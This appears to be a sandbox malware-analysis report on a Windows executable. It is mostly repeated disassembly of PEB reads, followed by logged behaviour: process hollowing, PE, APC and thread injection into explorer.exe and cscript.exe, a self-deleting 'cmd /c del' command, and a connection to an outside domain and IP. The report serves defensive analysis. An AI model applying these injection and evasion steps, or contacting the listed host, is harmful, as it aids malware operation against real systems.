            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04960EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049146A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0496070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04894F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04894F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04913884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0492B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048958EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04964015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04964015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04917016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04952073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049151BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049169A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049241E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048952A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04895210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04924257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04899240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0494D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04965BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049153CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049153CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048BDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04968B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.comfsresidential.com
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.50 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeThread register set: target process: 3424
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3424
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: E0000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 400000
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 401000
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 402000
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 403000
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 404000
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: CAD008
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: explorer.exe, 0000000B.00000000.745550579.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Users\user\Desktop\New_1007572_021.exe VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
